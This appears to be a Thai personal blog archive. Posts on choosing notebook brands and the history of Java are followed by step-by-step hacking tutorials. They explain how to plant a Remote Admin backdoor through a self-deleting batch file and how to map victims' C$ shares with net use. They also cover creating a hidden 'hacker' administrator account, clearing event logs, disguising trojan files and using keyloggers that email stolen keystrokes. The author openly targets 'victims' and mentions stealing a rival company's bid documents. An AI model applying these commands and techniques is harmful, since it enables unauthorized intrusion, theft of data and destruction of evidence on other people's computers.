หน้าเว็บ

วันพฤหัสบดีที่ 31 มีนาคม พ.ศ. 2554

ข้อดี และข้อเสีย ของ Notebook แต่ละยีห้อ

ข้อดี และข้อเสีย ของ Notebook แต่ละยีห้อ


การเลือกซื้อโน๊ตบุ๊ค แต่ละยี้ห้อ

Asus

เด่นเรื่องการรับประกัน จะยาวนานกว่ายี่ห้ออื่น
เป็นผู้ผลิต Mainboard ชื่อดัง การออกแบบจัดวางอุปกรณ์ภายในทำได้ดี
ปัจจุบันได้เริ่มผลิต Notebook บางรุ่นที่มีความโดดเด่นเรื่องการ์ดจอ เช่น รุ่น F8SG
ข้อด้อย Optical Drive และ แกนพับจอในบางรุ่นเสียง่าย



Acer
เด่นเรื่อง Spec ต่อราคา
คือถ้าราคาเท่ากัน จะได้ Spec เครื่องที่สูงกว่า
หรือ Spec ที่เท่ากันจะราคาถูกกว่ายี่ห้ออื่น
รูปทรงก็ดูสวยงาม โดนใจวัยรุ่น
จึงมียอดขายเป็นอันดับ 1 ในไทย
หลายท่านที่ใช้หลักการซื้อแบบเทียบ Spec แล้วซื้อตัวที่ถูกกว่า
ก็จะได้ยี่ห้อนี้
ข้อด้อยมักมีปัญหาที่หลากหลายหลังนำมาใช้ ซึ่งอาจจะเป็นเพราะราคาที่ถูกกว่ายี่ห้ออื่นก็เป็นได้


Toshiba
เป็นยี่ห้อแรกๆ ที่ร่วมบุกเบิกการผลิต Notebook
เด่นเรื่องความทนทาน และความเสถียรของ Software ยี่ห้อนี้จึงมักขายพร้อม Windows ลิขสิทธิ์ (แม้ในรุ่นราคาถูก)
เมื่อก่อนเน้นขายตลาดบนราคาเฉียดแสน
ตอนนี้เปิดตลาดระดับล่างควบคู่กัน ด้วยราคา 2-3 หมื่นบาทก็มีขาย
เทียบ Spec. แล้วดูเหมือนจะแพง แต่ถ้าคิดราคา Software ลิขสิทธิ์แบบ OEM ราว 2-3 พันบาทก็จะพอๆ กับยี่ห้ออื่น
ข้อ ด้อย Notebook ค่ายนี้จะไม่เน้นเรื่องการ์ดจอ จะใช้การ์ดจอรุ่นเทียบเท่า Onboard ทั่วไป เช่น GMA X3100 (ยกเว้นรุ่น Qosmio AV notebook)


Lenovo
ผู้ผลิตคอมพิวเตอร์รายใหญ่สัญชาติจีน
มีส่วนแบ่งการตลาดอันดับ 4 ของโลกรองจาก HP, Dell, Acer
เดิมเป็นผู้ผลิต Notebook และ PC ให้กับ IBM
ตอนหลังซื้อกิจการส่วน PC/Notebook มาทำตลาดเอง
เป็น Notebook ที่เน้นความทนทาน โดยเฉพาะรุ่น ThinkPad
ภายหลังออกเป็นรุ่น IdeaPad
ข้อด้อยการออกแบบภายนอกยังคงมีรูปลักษณ์ที่รับมาจาก IBM มาก
รูปทรงอาจเชยๆ ไม่โดนใจวัยรุ่น

HP/Compaq (ค่ายเดียวกัน)
ผู้ผลิตคอมพิวเตอร์รายใหญ่ของโลก
ส่วนแบ่งการตลาดมียอดขายเป็นอันดับ 1 ของโลก
ทำตลาดระดับบนด้วย Notebook HP รุ่น Pavillion
ขายระดับล่างด้วยยี่ห้อ Compaq
เป็น Notebook ที่ให้ประสิทธิภาพในการใช้งานได้ดีมากยี่ห้อหนึ่ง
มีศูนย์บริการค่อนข้างครอบคลุมทั่วไทย
ส่วนรูปทรงการออกแบบเป็นอเมริกันจ๋า อาจไม่ค่อยโดนใจวัยรุ่นไทย


 BenQ
เคยเป็นผู้ผลิตอุปกรณ์ร่วมกับ Acer
ในต่างประเทศจะมีชื่อเสียงมาก่อนไทย
ในไทยพึ่งเริ่มเข้าทำตลาด ด้วย Notebook ที่เน้นเรื่องการ์ดจอ
เช่น รุ่น Joybook S41 
และการออกแบบภายนอกที่ค่อนข้างโดนใจวัยรุ่น
แต่หลายท่านจะบ่นเรื่องต้องรอนานเมื่อเคลมประกัน (บางชิ้น เช่น Mainboard ต้องสั่งจากนอก)
ซึ่งอาจจะเกิดจากการ Support/Service ยังไม่เข้าที่เข้าทางจากการเริ่มเข้าทำตลาดใหม่ๆ ในประเทศไทย  


Sony
เป็น Notebook สัญชาติญี่ปุ่น
ที่เน้นทำตลาดระดับบนด้วยการออกแบบที่สวยงาม  
Spec เครื่องที่สูง
แต่ราคาก็สูงตามไปด้วย
ช่วงหลังเปิดตลาดระดับกลางด้วย Notebook ระดับราคาประมาณ 4-5 หมื่นบาทด้วย


Fujitsu
เป็น Notebook สัญชาติญี่ปุ่นเช่นกัน
ใช้สีเทาเงินเป็นเอกลักษณ์
เป็น Notebook ที่จับตลาดระดับบนเช่นเดียวกับ Sony
เน้นการออกแบบ และ Spec ที่สูง
ราคาก็สูงตามไปด้วยเช่นกัน
Dell
เป็น Notebook ที่มีวิธีการจำหน่ายแบบแตกต่างจากยี่ห้ออื่น
ไม่มีขายตามร้านจำหน่ายทั่วไป ถ้าเห็นมีขายแสดงว่าร้านนั้นโทรฯ สั่งซื้อจาก Dell มาอีกที
ถ้าต้องการสั่งซื้อเราจะโทรฯ ติดต่อกับ Sale เพื่อกำหนด Spec ตามที่เราต้องการ
หลังจากนั้นจะเข้าสู่กระบวนการผลิตและจัดส่งNotebook ของ Dell เด่นเรื่องความทนทานและการบริการ
ถ้าเครื่องมีปัญหาช่างจาก Dell จะให้บริการแบบ Onsite Service (บริการถึงบ้าน/สำนักงานในวันทำการถัดไป)

แต่ลักษณะการขายแบบนี้คนไทยเราไม่ค่อยคุ้นเคย
และไม่เห็นสินค้าก่อนการโอนจ่ายเงิน
ดังนั้นอาจได้เครื่องที่รูปทรงไม่ถูกใจได้
(สำหรับเบอร์โทรสั่งซื้อสินค้าจากบริษัท Dell ได้แก่ 1800-060-061 ​จันทร์​-​ศุกร์​ 8.00-17.00 ​น.)
  



SVOA ,Atec
เป็น Notebook ที่เรียกว่า Local Brand ครับ หรือเป็นยี่ห้อของไทย
SVOA เป็นของบริษัทสหวิริยาโอเอซึ่งเดิมเป็นบริษัทตัวแทนจำหน่ายคอมพิวเตอร์ ยี่ห้อ Acer เมื่อ Acer เป็นที่นิยมในไทยบริษัทแม่เลยเข้ามาทำตลาดเอง สหวิริยาโอเอจึงหันมาทำตลาดคอมพิวเตอร์ในชื่อของตนเองคือ SVOA เป็น Notebook ที่เมื่อเทียบ Spec/ราคา ก็คล้ายๆ Acer คือ Spec เท่ากันราคาจะถูกกว่า หรือ งบเท่ากันจะได้ Spec ที่ดีกว่า เป็น Notebook ที่เน้นในเรื่องการออกแบบรูปลักษณ์
แต่ในการนำมาใช้งานก็เห็นผู้ใช้บ่นกันในเรื่องการบริการหลังการขายพอสมควรนะครับ 


Mac Book

จากค่าย Apple คอมพิวเตอร์ที่มีความโดดเด่นเรื่องการใช้งานด้าน Graphic
และการออกแบบที่ถือว่าอยู่ในขั้นเทพ
ผลิตภัณฑ์จากค่ายนี้การออกแบบจะใส่ใจทุกรายละเอียด
จึงได้ผลิตภัณฑ์ที่มีความสวยงามลงตัว
สะดวกในการใช้งาน(ถ้าคุ้นเคยแล้ว)
ปัจจุบันได้ใช้ CPU จาก Intel ในผลิตภัณฑ์ ทำให้สามารถลง Windows และ OS X Leopard ในเครื่องเดียวกันได้
ผู้ใช้ Mac Book จะดูภาพลักษณ์ดี ไวรัสไม่ค่อยกวนใจ
แต่ถ้าเครื่องมีปัญหาก็อาจมองหาผู้รู้ยากหน่อย รวมทั้งราคาก็ยังถือว่าสูงกว่า PC Notebook อยู่บ้างครับ






การเลือกซื้อโน๊ตบุ๊ค  Notbook   

วันเสาร์ที่ 30 ตุลาคม พ.ศ. 2553

ที่มาของภาษา Java

ที่มาของภาษา Java 
Java เป็นภาษาที่เกิดขึ้นจากการพัฒนาของบริษัท Sun Microsystems โดยมีที่มาจากภาษาที่ชื่อว่า Oak
ซึ่งเป็นภาษาที่ใช้ภายใน Sun เองแต่หลังจากที่ Sun ได้พัฒนา Oak และใช้มาอีกระยะหนึ่ง Sun ก็ได้
นำเอา Oak ออกมาสู่สายตาชาวบ้านทั่วไป แต่เนื่องจากว่า ชื่อของ Oak ได้มีผู้ใช้อยู่ก่อนแล้ว Sun จึง
ต้องหาชื่อใหม่ให้กับภาษานี้ ซึ่งในตอนแรกก็ได้ทดลองหลายชื่อ เช่น Silk, Ruby, และ WRL (Web
Runner Language) แต่ชื่อเหล่านี้ก็ไม่ได้ถูกเลือก ในที่สุด Java ก็กลายเป็นชื่อของภาษานี้ (ทั้ง ๆ ที่ไม่มี
อะไรเกี่ยวข้องกับ กาแฟ จาก ชวา หรืออะไรที่เกี่ยวข้องกับเกาะชวาเลย)
Java มีอยู่มากมายหลาย version แต่ version ล่าสุดของ Java ขณะที่เขียนตำราเล่มนี้ คือ J2SDK1.4.1
ผู้อ่านสามารถติดตาม version ใหม่ ๆ และ download ได้ที่ web site ของ Sun ที่ได้ให้ไว้ก่อนหน้านี้
ในบทที่สองเราจะมาทำความรู้จักกับข้อกำหนด ต่าง ๆ ของ โปรแกรม ข้อมูล (data) ตัวแปร (variable)
และ การประมวลผล (calculation – evaluation)

วันอาทิตย์ที่ 19 กันยายน พ.ศ. 2553

การสร้าง Back doors

การสร้างประตูลับ 


(Back doors)

โหลดโปรแกรม ตามลิ้งค์นี้ก่อน
ผมเชื่อได้ว่า หัวข้อนี้ หลายๆคนคงชอบมาก เพราะจะเป็นการลงโปรแกรม Trojan Backdoor Remote ต่างๆไปที่เครื่องเหยื่อ เพื่อที่คุณจะได้มีโอกาสกลับมาขโมยข้อมูลใหม่ หรืออาจทำเพียงแค่แกล้งคนเล่นสนุกๆเท่านั้น เรามาลองดูกันว่าเค้ามีวิธีติดตั้งกันอย่างไรบ้าง ในตัวอย่างที่ผมจะแนะนำนั้น ผมขอยกตัวอย่างมา 1 โปรแกรมนะครับ Remote Admin 2.1 สำหรับผู้ที่ถนัดโปรแกรมอื่นผมก็ไม่ว่าอะไร เพราะคุณอาจใช้แนวทางที่ผมสอนมาประยุกต์ใช้ไปด้วยได้เลย

หลักสำคัญในการใช้โปรแกรม

ส่วนโปรแกรมอื่นๆที่เป็นโปรแกรม Backdoor and Trojan นั้นเวลาคุณจะเข้าไปควบคุมเครื่องเหยื่อ คุณจะต้องส่งไฟล์ ที่มีชื่อประมาณว่า "server หรือ srv" ประมาณนี้ครับ เพราะว่าจะเป็นตัวทำให้เครื่องเหยื่อ รอการ Connect จากเครื่อง Cliend เครื่องของคุณนั่นเอง และไฟล์ server ต่างๆคุณสามารถที่จะเปลี่ยนให้เป็นชื่ออื่นๆได้ วิธีที่เนียนที่สดคุณอาจเปลี่ยนชื่อไฟล์ server เหล่านี้ให้เป็นชื่อคล้ายๆไฟล์ระบบ เช่น NTSys Notepads เหอๆ ลองจินตนาการเอาเองนะ

Remote Admin 2.1

ที่ผมแนะนำโปรแกรมนี้เหตุผลคือ

-โปรแกรมนี้สามารถติดตั้งบนดอสได้ ลองคิดดูว่า ถ้าเป็นเครื่องอื่นๆใน Internet คุณไม่สามารถไปนั่งหน้าเครื่องได้ ลองคิดดูโปรแกรมส่วนใหญ่แล้วเวลาติดตั้งมักจะมีหน้าต่างให้คลิก Next ไปเรื่อยๆ(แล้วจะติดตั้งยังไงคิดดู) แต่โปรแกรมนี้เด็ด การไปติดตั้งเครื่องเหยื่อนั้น เนียนสุดๆ

-โปรแกรมนี้มีขนาดไฟล์ที่เล็กกระทัดรัด สามารถใส่แผ่น 3 นิ้วได้อย่างสบาย และใช้เวลาติดตั้งเพียง 10 วินาที (อันนี้รวมการก็อบไฟล์ลงเครื่องด้วยนะ) และติดตั้งด้วยการ ดับเบิ้ลคลิกแค่ครั้งเดียว จ๊าบบบ..

ก่อนอื่นให้คุณติดตั้งโปรแกรมให้เสร็จก่อนนะครับ เพราะส่วนนี้มันไม่ยากเกินความสามารถของทุกคนอยู่แล้วผมเชื่อ และถ้าคิดว่ากลัวใช้ไม่เป็น ลองไปอ่านดูได้ที่นี่ครับ

http://www.xirbit.com/html/programs/radmin/index.shtml

จากนั้นให้ไปที่โฟล์เดอร์ของโปรแกรมนะครับ แล้วคุณจะเห็นไฟล์อยู่ 2 ตัวที่จะเอาไปใช้ในเครื่องเหยื่อ คือ r_server.exe and AdmDll.dll ซึ่ง 2 ไฟล์นี้ต้องอยู่ด้วยกันในเครื่องเหยื่อนะครับ จะเอาไปใส่ที่ไหนก็ได้

ออกแรงกันหน่อยนะ ต่อไปต้องเขียน bat file ที่คุณต้องสร้างขึ้นเองโดนการเปิด Notepad ขึ้นมาเขียนตามนี้


r_server /install

r_server /pass: 123456 /save

ตรงตัวเลข 123456 ที่เป็นสีแดง ให้คุณเปลี่ยนเป็นตัวอะไรก็ได้ มันจะเป็น password เอาไว้เข้าไปควบคุมเครื่องเป้าหมาย ต้องจำให้ได้นะครับ เพราะว่าก่อนคุณจะเข้าไปควบคุมเครื่องที่คุณได้ติดตั้งไฟล์ r_server คุณจะต้องใส่ password ที่คุณได้ตั้ง ซึ่งในตัวอย่างที่ผมได้ทำ password เป็น 123456 ถ้าดันลืมไม่งั้นต้องทำ batfile ส่งไปใหม่

จะเห็นว่ารูปข้างบน นั้นผมได้ทำคำสั่ง del radmin.bat เพราะว่าหลังจากที่ผมเขียนคำสั่งด้านบนเสร็จแล้ว ผมจะเซฟเป็นชื่อ radmin.bat เพราะว่าหลังจากรันคำสั่งติดตั้งต่างๆแล้ว ให้ลบไฟล์ที่พิมพ์นี้ทิ้งไป เพื่อปกปิดร่องรอย ต้องระบุนามสกุลเป็น .bat อย่าลืมนะครับเวลา save จากนั้นคุณก็เอาไฟล์นี้ไปไว้กับ 2 ไฟล์ รูปด้านบนคือไฟล์ r_server.exe กับ AdmDll.dll และ radmin.bat ที่สร้างมาสดๆรวมเป็น 3 ไฟล์ เอาไว้ที่เครื่องเป้าหมาย โดยการส่งทางใดก็ได้ (ต้องเอาไว้ที่เดียวกัน) ตามวิธีที่ผมได้สอน hack จากเรื่องอื่น โดยต้องรันที่เครื่องเป้าหมายนะ โดยเรียกไฟล์ radmin.bat ที่เครื่องเป้าหมาย (ขโมย ดอสฝั่งเครื่องเหยื่อมาก่อน)ไม่ใช่เครื่องคุณเอง แล้วหลังจาก restart เครื่องเป้าหมาย คุณก็สามารถคุมได้เลย สังเกตบรรทัดสุดท้าย เป็นการลบไฟล์ radmin.bat นี้ทิ้งไปด้วย ป้องกันเผื่อเหยื่อเปิดอ่านดูไฟล์ (เวลาเรียกไฟล์ radmin.bat ขึ้นมาดูหรือแก้ไข ให้คลิกขวาที่ไฟล์นะครับ เลือก edit ) ถ้าดับเบิ้ลคลิกจะเป็นการเรียกโปรแกรม


จากนั้นก็รอเวลาให้เหยื่อ restart เครื่องแล้วมาต่อเน็ตใหม่ เพียงเท่านี้ คุณก็สามารถควบคุมเครื่องเหยื่อได้ตามต้องการ

วันเสาร์ที่ 18 กันยายน พ.ศ. 2553

การขโมยข้อมูล

การขโมยข้อมูล


(Pilfering)

หัวข้อนี้ก็ไม่ได้มีอะไรสำคัญอีกเหมือนกัน เพียงแต่ ต้องหัดเป็นคนสังเกตุ และก็ งก นิดๆ เหอๆ "ทำไมผมพูดแบบนี้"

ถ้าคุณนั้นสามารถเข้าไปดูไฟล์ต่างๆจากเครื่องเหยื่อได้แล้ว (MapDrive) คุณสามารถที่จะเห็นไฟล์ข้อมูลต่างๆเช่น ไฟล์งานทั่วๆไป ไฟล์ที่เก็บpassword ไฟล์ข้อมูลของบุคคลอื่นๆ ถ้าใส่ใจกับสิ่งแวดล้อมในไฟล์ข้อมูล คุณอาจได้ประโยชน์มากกว่าที่คิดเสียอีก แต่ก็อย่าลืมเรื่องเวลาด้วยนะ อย่าไปเกาะเครื่องเหยื่อนานจนเกินไป เหยื่อคุณอาจไม่หมูก็ได้ และจะโดนสวนกลับ จนหงายเก๋ง

ลองคิดดูว่าถ้าเป็นบริษัทที่มีการแข่งขันกัน อย่างการประมูลราคางานต่างๆ ถ้าโชคดีเข้าไปดูไฟล์ที่บริษัทคู่แข่งส่งประมูล คิดดูว่าบริษัทผมจะได้เปรียบขนาดไหน เวลายื่นซองประมูลงาน เงินที่ผมประมูลต่างจากบริษัทคู่แข่งแค่ 10 บาท เพียงแค่นี้กลายเป็นว่าบริษัทผมชนะการประมูล คิกๆ เรื่องข้อมูล สมัยนี้ถือว่าสำคัญมากๆ เอาเป็นว่าถ้าใครมีข้อมูลเยอะกว่า แน่นอนกว่า จะได้เปรียบมากกว่า จริงมั้ยครับ แต่ผมมักสนใจกับไฟล์รูปมากกว่าอ่า.... ไม่โหดพอ



การ Map Drive

และหลังจากที่คุณได้สร้าง User Admin ในเครื่องเหยื่อได้แล้วที่ชื่อ hacker และมี password เป็น passhack และก่อนหน้านี้คุณได้แสกนเครื่องเหยื่อแล้วว่าเครื่องเหยื่อได้เปิด share ที่ไดร์ฟ C: (ถ้า งง กลับไปอ่านเรื่อง scan ใหม)ให้คุณพิมพ์คำสั่งด้านล่างนี้เพื่อเข้าไป MapDrive C: ของเครื่องเหยื่อ

net use \\ 203.114.234.5 \ C$ passhack /u:hacker

คำสั่งบนนี้ จะเป็นการเชื่อมต่อไปที่ share drive c: ในเครื่องเป้าหมาย โดย PasswordAdmin เป็นสิ่งที่ได้มาจากขั้นตอนด้านบนเรียบร้อยมาแล้วนะครับ โดยเครื่องนั้นต้องเปิด share C$ มาก่อนหน้านี้ แต่ถ้าคุณได้ใช้คำสั่งนี้แล้วยังเชื่อมต่อ (connect) ยังไม่ได้อีกคุณอาจต้องพิมพ์

net use \\ 203.114.234.5 \ C$ passhack /u:203.114.234.5\ hacker

โดยเพิ่ม 203.114.234.5 มาตรงหน้า user Admin ขึ้นมาครับหรือ

net use \\ 203.114.234.5 \ C$ passhack /u:ชื่อเครื่องเหยื่อหรือชื่อ domain\ hacker

แต่ถ้าพิมพ์เป็น net use \\ ...IP เหยื่อ.. \D$ passhack /u: hacker

D$ เป็นการ connect เชื่อมต่อที่ share ของ drive D:

ซึ่งตอนนี้อาจลองเช็คดู IP ที่หน้าต่างดอสนี้โดยลองพิมพ์ ipconfig หรือใช้คำสั่ง dir ในหน้าต่างนี้ เพื่อให้แน่ใจว่าเป็นเครื่องเป้าหมาย ถ้าลองดูแล้วเป็นเครื่องเป้าหมายจริงๆ ก็เหมือนกับคุณได้นั่งอยู่หน้าเครื่องเป้าหมายจริงๆ การพิมพ์คำสั่งต่างๆในหน้าต่างนี้ ก็คือการสั่งคำสั่งต่างๆในเครื่องเป้าหมาย ไม่ใช่เครื่องคุณ และคุณอาจส่งไฟล์ไปโดยโปรแกรม remote เพื่อที่จะสร้างทางลับต่าง เพื่อที่จะเข้าไปควบคุมอีก ในโอกาสหน้า การส่งโปรแกรมไปนั้น ดูวิธีได้จาก link Backdoor



อีกวิธีแบบง่ายๆ ไม่ต้องยุ่งยากแบบวิธีด้านบน

Terminial Service นั้นจะเป็นการอนุญาตให้ Admin สามารถรีโมทมากระทำการแก้ไขส่วนต่างๆภายในคอมพิวเตอร์จากระยะไกล ได้โดยเป็น mode graphic ถ้าไม่อย่างนั้น คุณก็ต้องใช้โปรแกรม tftp32.exe โดยใช้บนดอสแบบวิธีด้านบน ถ้าเครื่องเหยื่อไม่ได้เปิด Terminial Service แล้ว คุณจะใช้วิธีแบบที่ผมสาธิตข้างล่างนี้ไม่ได้

ให้เปิดโปรแกรม Windows Explorer ขึ้นมาก่อนครับแล้วทำตามรูปด้านล่าง


จะมีหน้าต่างขึ้นมาดังรูปด้านล่างนี้

drive G จะเป็น drive ที่เราได้มาจากเครื่องเหยื่อ จะมาอยู่ที่ G: ของเครื่องเรา
อีกช่อง ให้คุณใส IP เครื่องเหยื่อที่เราได้ และแชร์ที่คุณจะเข้าไปในเครื่องเหยื่อ ซึ่งเขียนได้แบบนี้
\\...IP เหยื่อ.. \IPC$ เป็นการเข้าไปที่ share ของเครื่องเป้าหมาย ** สำคัญมาก ** ซึ่งเครื่องเป้าหมายต้องเปิดรอเอาไว้และมีหลายๆตัว ที่คุณสามารจะใช้ได้ครับ IPC$ ใช้ได้ก็ต่อเมื่อ port 139 ของเครื่องเป้าหมายเปิดรออยู่ Listen นั่นเอง โดยคุณอาจแสกนไปที่เครื่องเป้าหมายก่อน ที่จะใช้คำสั่งนี้ คุณอาจเปลี่ยนไป connect เชื่อมต่อที่ share อื่นๆ ได้โดย \\...IP เหยื่อ.. \C$


\\...IP เหยื่อ.. \C$

C$ เป็นการ connect เชื่อมต่อที่ share ของ drive C:

\\...IP เหยื่อ.. \D$

D$ เป็นการ connect เชื่อมต่อที่ share ของ drive D:

ให้คุณใส IP เครื่องเหยื่อที่เราได้ และแชร์ที่คุณจะเข้าไปในเครื่องเหยื่อ ซึ่งเขียนได้แบบนี้

\\...IP เหยื่อ.. \IPC$ เป็นการเข้าไปที่ share ของเครื่องเป้าหมาย ** สำคัญมาก ** ซึ่งเครื่องเป้าหมายต้องเปิดรอเอาไว้และมีหลายๆตัว ที่คุณสามารจะใช้ได้ครับ IPC$ ใช้ได้ก็ต่อเมื่อ port 139 ของเครื่องเป้าหมายเปิดรออยู่ Listen นั่นเอง โดยคุณอาจแสกนไปที่เครื่องเป้าหมายก่อน ที่จะใช้คำสั่งนี้ คุณอาจเปลี่ยนไป connect เชื่อมต่อที่ share อื่นๆ ได้โดย




C$ เป็นการ connect เชื่อมต่อที่ share ของ drive C:

\\...IP เหยื่อ.. \D$

D$ เป็นการ connect เชื่อมต่อที่ share ของ drive D:

จากนั้นคุณก็กดปุ่ม Finish แล้วจะมีหน้าต่างขึ้นมา จากนั้นให้คุณใส่ Username Admin ของเครื่องเหยื่อ กับ Password ที่เราได้มาจากการทำ Brute Force หรือ Dump Password ที่เครื่องเหยื่อได้มาแล้ว

วันอังคารที่ 14 กันยายน พ.ศ. 2553

การปิดบังอำพราง การแฮก

การปิดบังอำพราง


(Covering)

ในหัวข้อนี้ ไม่ได้มีอะไรมากเลยครับ จะเปรียบเทียบบางอย่างให้คุณฟังก่อนนะครับ ถ้าคุณไปย่องเบาที่บ้านใครก็ตาม เวลาเสร็จงานโจรกรรมต่างๆแล้วก็ต้องมีการทำลายหลักฐาน จริงมั้ยครับ การที่จะ Hack เครื่องใดๆก็ตามแต่ สำหรับผู้ที่ชำนาญแล้ว มักจะต้องลบร่องรอยต่างๆที่ได้กระทำเอาไว้ (หรือลบไฟล์ข้อมูลเหยื่อด้วย หรือป่าว! อย่าเชียวน๊า อย่าไปแกล้งเค้า) คุณแค่ลบไฟล์ ที่เป็นไฟล์ log ที่เก็บข้อมูลต่างๆเท่านั้นก็เพียงพอแล้ว และไฟล์ที่คุณได้ส่งเข้าไป หรือสร้างขึ้นมาบนเครื่องเหยื่อ ถ้ามันหมดประโยชน์แล้วก็ควรกำจัดทิ้งไปด้วย

นอกเรื่องอีกนิด

จากประสบการณ์ผม ที่เคยเจาะตามเครื่องต่างๆ รวมถึงบางเว็บไซด์ ผมจะส่งเมล์หรือเซฟ text file เอาไว้ที่เครื่องเหยื่อว่า เครื่องคุณมีช่องโหว่ นี่ไงหลักฐานว่าผมได้บุกเข้ามาในเครื่องคุณได้แล้ว และทิ้งเมล์ให้เค้าติดต่อกลับมา เชื่อมั้ย ไม่มีคนตอบกลับมาซักคนเลยอ่า เราก็อุตสาห์เป็นคนดีมีจรรยาบรรณ มันเสือกดันไม่สนใจซะนี่ แย่เจงๆ พักหลังๆผมเลยเอาโปรแกรม remote ไปลงซะเลย คิกๆ ปรากฏว่า "วันๆมานเล่นแต่เกมส์ โอ้ววว... อนาคตเด็กไทย" แต่ดีนะไม่มีรูปโป้ ไม่งั้นเสร็จผม มานสนแต่เกมส์ บ้าเจง ไม่เห็นเหมือนเราเลย คิกๆ

โปรแกรมที่ผมเคยใช้เล่นกันอยู่บ่อยก็คือโปรแกรม Cleareventlog.exe ซึ่งโปรแกรมนี้จะคอยลบไฟล์ต่างๆใน log ให้หมดสิ้นไป ส่วนโปรแกรมอื่นคุณลองหาจากใน Internet จาก google เองนะครับ การค้นหาก็คงไม่ยากเย็นอะไร

สรุป

-ไฟล์ต่างๆที่คุณได้ส่งไปรันที่เครื่งอเหยื่อนั้น เช่นไฟล์ server ต่างๆไม่ว่าจะเป็นของ Backdoor Trojan Remote ต่างๆ การปิดบังที่ดีที่สุดคือ เปลี่ยนชื่อไฟล์เหล่านั้นให้เป็นชื่อคล้ายๆกับไฟล์ระบบ เช่น nodepad.exe หรือ NTsys.exe เพื่อให้เหยื่อเห็นแล้วไม่กล้าที่จะลบ

-ไฟล์บางไฟล์เช่นไฟล์ที่เป็นตัวติดตั้งโปรแกรมเช่น bat file ที่คุณสร้างมาเพื่อติดตั้ง Backdoor Trojan Remote ต่างๆ ให้คุณทำการลบทิ้งด้วย หรือเพิ่มคำสั่งให้มันมีการลบตัวเอง

-หาโปรแกรมต่างๆที่กำจัด log ไฟล์ต่างๆ (โปรแกรมประเภทที่ไม่จำเป็นต้องติดตั้งที่เครื่องเหยื่อ) ที่สามารถรันได้เลยจะยิ่งดี เพราะมันจะทำการเคลียร์ ลบ หลักฐานต่างๆที่เราเข้าไปเจาะ ซึ่งบางทีมันอาจเก็บค่า IP รวมไปถึงการกระทำต่างๆ และเวลา ที่คุณได้กระทำเอาไว้

-อันนี้อาจไม่เกี่ยวซักเท่าไหร่ "คุณอย่าเที่ยวไปเป่าประกาศตามเว็บบอร์ดหรือในหน่วยงาน ว่าฉ้านก็เป็น Hacker" เพราะ เมื่อเกิดเหตุการณ์ต่างๆที่ เป็นการเข้าข่ายโจรกรรมทางข้อมูลต่างๆในหน่วยงานคุณเอง หรือที่ไหนๆก็ตาม คุณนั่นแหละเป็นคนแรกที่จะซวย นิ่งไว้

อยากเป็นแฮกเกอร์ ก็ต้องทำใจ

วันอาทิตย์ที่ 12 กันยายน พ.ศ. 2553

การยกระดับสิทธิ

Admin Priviledge

Keylog


โปรแกรมประเภท Keylog คือเป็นโปรแกรมประเภท ดักจับข้อมูลต่างๆที่ที่ถูกพิมพ์ลงไปด้วย kebord หรือแป้นพิมพ์ที่คุณใช้อยู่เป็นประจำ จะเกิดอะไรขึ้นถ้าโปรแกรมประเภทนี้มาอยู่ที่เครื่องคุณ เหอๆ "ละเมิดสิทธิกันนี่หว่า" ถึงคุณจะโวยวายแบบนี้ไป ผมเชื่อว่า คนที่เอาโปรแกรมแบบนี้มาใส่ในเครื่องคุณ เค้าไม่สลดหลอกครับ คิกๆ

ลองคิดดูว่า ตั้งแต่คุณเปิดเครื่องคอมใช้ คุณต้องพิมพ์อะไรลงไปบ้าง เวลาคุณเช็คเมล์ คุณต้องพิมพ์อะไรไปบ้าง "ให้ระวังร้าน Internet ให้ดีๆ อย่าไปเช็คเมล์หรือ login เข้าเว็บต่างๆในร้าน" เพราะถ้าเกิดมีผู้ไม่หวังดีแอบลงเอาไว้ แล้วคุณจะจ๋อย... เมื่อคุณโดนขโมย บางคนที่เป็น Webmaster และชอบไปใช้ร้าน Internet เพื่อ login ต่างๆไม่ว่าจะ mail หรืออะไรก็ตาม ผมเห็นมาเยอะแล้ว "โอ้วว...โน้... เว็บผมโดน hack เกียจจริงๆไอ้พวก hacker นี่ มันเลวเจงๆ อย่าให้กรูรู้นะว่าใคร " ผมว่าคุณโทษตัวเองดีกว่านะ

ส่วนโปรแกรมเท่าที่ผมลองใช้มีทั้งในดอส และเป็นแบบแสดงผลที่อ่านเข้าใจง่าย นั้นหาน้อยตัวที่จะรองรับภาษาไทย แต่ก็มีอยู่ 1 โปรแกรมที่ผมเคยใช้ และดีมากๆ ชื่อโปรแกรม StarMonitor ไม่มีปัญหากับภาษาไทยด้วย ขอบอก และยังสามารถดักจับ ภาพหน้าจอโดยการตั้งเวลาได้อีกด้วย และท้ายสุด โปรแกรมนี้สามารถที่จะส่งเมล์ไปหาคุณได้โดย อัตโนมัติด้วซิ น่ากลัวมั้ยครับส่วนโปรแกรมประเภทนี้ตัวอื่นๆ ผมไม่เคยได้ลองครับ คุณอาจหาได้จาก google โปรแกรมนี้มีอยู่ในแผ่น cd ที่ผมขายนะครับ(ไฟล์สอนเป็นไฟล์ vdo)ติดต่อ Webmaster

________________________________________

Exploit

วิธีการนี้ คุณจะต้องทำหลังจาก Access เข้าไปในเครื่องเหยื่อได้แล้ว หรือคุณสามารถที่จะนั่งอยู่หน้าจอเครื่องเหยื่อได้ ถ้าไม่เข้าใจไปอ่านที่นี่ครับ Gaining Access เมื่อคุณ Access หรือเข้าไปในเครื่องเหยื่อจากระยะไกลได้แล้วถึงจะทำวิธีตามที่ผมบอกในด้านล่างนี้

วิธีที่เนียนที่สุด ให้คุณสร้าง Account ใหม่ลงไปบนเครื่องเหยื่อ แล้วทำให้ Account ใหม่ที่สร้างขึ้นมาเป็น Admin (ในกรณีที่ admin ในเครื่องเหยื่อได้กำลังใช้งานอยู่ ในตอนที่คุณ hack วิธีด้านบนได้แล้ว) โดยพิมพ์คำสั่งด้านล่างนี้ลงไปที่หน้าต่างดอสของเครื่องเหยื่อ แล้วคุณก็ได้ขโมยหน้าต่างดอสมาได้แล้วด้วย ทำได้โดยพิมพ์แต่ละบรรทัดต้องกด enter ทุกครั้ง มี 2 บรรทัดดังนี้

net user hacker passhack /add

net localgroup Administrators hacker /add

(คำสั่งตรงที่ตัวอักษร สีเหลือง นั้น คุณสามารถเปลี่ยนได้ตามต้องการ แต่ต้องจำไว้ด้วยว่าตั้งชื่อ/ pass อะไรลงไป เพื่อที่จะเข้าไปคุมเครื่องเหยื่อเครื่องนี้อีกเมื่อไหร่)

บรรทัดแรก จะเป็นการสร้าง user ชื่อ hacker ขึ้นมาในเครื่องเหยื่อ และให้ user นี้มี password เป็น passhack

